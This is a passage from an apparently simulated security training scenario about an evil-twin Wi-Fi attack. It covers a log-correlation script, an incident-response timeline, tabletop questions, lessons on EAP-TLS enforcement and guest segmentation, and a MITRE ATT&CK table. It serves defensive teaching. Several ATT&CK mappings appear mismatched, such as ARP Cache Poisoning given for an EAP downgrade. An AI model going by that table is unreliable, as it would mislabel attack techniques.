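            "users": sorted({user for user, _ in attempts}),
            "severity": "CRITICAL" if bssid in rogues and attempts else "HIGH",
        }
    return alerts


if __name__ == "__main__":
    print(json.dumps(correlate(WIDS_LOG, RADIUS_LOG), indent=2))
```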

Incident Response:

# Simulated incident response (educational only)
[2026-04-01 14:15:00 UTC] ALERT: Wireless Evil Twin incident response activated

[2026-04-01 14:20:00 UTC] ACTION: RF containment
  - WLC RF containment activated for rogue BSSID FF:AA:BB:CC:DD:EE
  - Nearby managed APs broadcasting deauth frames to rogue AP clients
  - Physical security dispatched to Building 3 parking area
  - All rogue AP BSSIDs added to WLC containment list

[2026-04-01 14:30:00 UTC] ACTION: Credential remediation
  - All 29 affected user accounts PASSWORD RESET forced
  - VPN sessions from non-corporate IPs TERMINATED
  - MFA re-enrollment REQUIRED for all affected users
  - Conditional Access: block VPN from unrecognized devices (24h)

[2026-04-01 14:45:00 UTC] ACTION: Wireless security hardening
  - 802.1X supplicant GPO updated: EAP-TLS ONLY (remove TTLS/PEAP fallback)
  - Certificate pinning enforced for RADIUS server certificate
  - Guest network: implement device registration + MAC filtering
  - WIDS sensor coverage expanded to parking areas

[2026-04-01 15:00:00 UTC] ACTION: Network segmentation review
  - Guest VLAN ACLs tightened: block access to internal services
  - VPN gateway: require certificate + password (mutual auth)
  - Internal services: enforce HTTPS with HSTS on all web applications

[2026-04-01 16:00:00 UTC] ACTION: Impact assessment
  Rogue APs deployed: 2 (SentinelGuest + SentinelCorpSecure)
  Devices connected to rogue APs: 42
  Credentials captured (captive portal): 28
  Credentials captured (EAP downgrade): 8 (5 cracked)
  Session cookies intercepted: 12
  VPN access achieved: Yes (from captured credentials)
  Internal systems accessed: Intranet, Confluence, SCCM
  Privileged accounts compromised: 3 (1 IT Admin)
  Dwell time: 4 hours (deployment to WIDS detection)
  Physical security gap: Parking garage outside WIDS coverage

Decision Points (Tabletop Exercise)

Decision Point 1 — Wireless Architecture

Your corporate wireless network supports both EAP-TLS and EAP-TTLS/MSCHAPv2 to accommodate legacy devices. How do you migrate all devices to EAP-TLS only while maintaining access for devices that cannot support certificate-based authentication? What timeline and communication plan would you implement?

Decision Point 2 — Guest Network Isolation

A scan from the guest VLAN reveals that internal services (LDAP, VPN gateway, internal web apps) are reachable. How do you redesign your guest network segmentation? What network access control (NAC) and firewall rules would prevent this lateral access?

Decision Point 3 — WIDS Coverage Gaps

Your WIDS has coverage gaps in parking areas and recently renovated spaces. How do you prioritize expanding sensor coverage? What alternative detection methods (managed device telemetry, network anomaly detection) complement WIDS for detecting rogue APs?

Decision Point 4 — Physical Security Integration

The attacker operated from a parking garage for 4 hours. How do you integrate physical security (cameras, badge access, security patrols) with wireless security monitoring to detect and respond to physical wireless threats? What procedures link your SOC with physical security teams?

Lessons Learned

Key Takeaways

  1. EAP method downgrade defeats WPA2-Enterprise security — If client supplicants accept multiple EAP methods, a rogue AP can force downgrade from certificate-based EAP-TLS to password-based EAP-TTLS/MSCHAPv2, enabling offline credential cracking. Organizations must enforce EAP-TLS only via supplicant configuration policies and pin the RADIUS server certificate.

  2. Guest network captive portals harvest corporate credentials — Users routinely enter their corporate credentials into captive portals, especially when the portal mimics corporate branding. Guest networks should use separate credential systems (temporary codes, SMS verification) never linked to corporate Active Directory.

  3. WIDS coverage gaps create blind spots for rogue AP detection — Wireless intrusion detection only works where sensors have coverage. Parking areas, lobbies, and recently renovated spaces often lack sufficient sensor density. Supplementary detection using managed device telemetry (detecting when corporate devices connect to unknown APs) fills these gaps.

  4. Guest-to-corporate network segmentation is critical — Services accessible from the guest VLAN dramatically increase the impact of guest credential compromise. Strict ACLs should ensure guest traffic can only reach the internet, with no routes to internal services, VPN gateways, or management interfaces.

  5. Internal services without HTTPS enable session hijacking — Any internal web application served over HTTP is vulnerable to session cookie interception when users are on a compromised network. HSTS with preloading should be enforced on all internal services, regardless of whether they are "internal only."

  6. Credential reuse between guest and corporate networks amplifies impact — Users entering their AD credentials on the guest captive portal gave attackers the same credentials used for VPN, email, and internal systems. Password managers and single-sign-on with phishing-resistant MFA break this reuse chain.

MITRE ATT&CK Mapping

Technique ID   Technique Name                      Phase
T1040          Network Sniffing                    Reconnaissance (passive wireless survey)
T1557          Adversary-in-the-Middle             Initial Access (evil twin AP deployment)
T1557          Adversary-in-the-Middle             Credential Access (captive portal + session hijack)
T1557.002      ARP Cache Poisoning                 Credential Access (802.1X EAP downgrade)
T1040          Network Sniffing                    Collection (RADIUS challenge-response capture)
T1078.001      Valid Accounts: Default Accounts    Lateral Movement (credential reuse for VPN)